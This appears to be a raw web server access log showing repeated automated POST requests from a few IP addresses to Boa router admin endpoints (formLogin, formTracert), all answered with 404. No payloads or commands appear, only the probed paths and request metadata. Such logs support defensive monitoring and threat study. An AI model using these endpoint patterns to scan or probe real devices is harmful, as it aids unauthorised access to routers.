45.134.225.133 - - [07/May/2025:14:41:42 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
176.65.142.182 - - [07/May/2025:14:41:57 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.142.182 - - [07/May/2025:14:41:57 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.142.182 - - [07/May/2025:14:41:57 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
45.134.225.133 - - [07/May/2025:14:42:27 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:43:22 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:44:00 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
176.65.137.188 - - [07/May/2025:14:44:18 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [07/May/2025:14:44:18 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.137.188 - - [07/May/2025:14:44:18 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
45.134.225.133 - - [07/May/2025:14:44:31 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
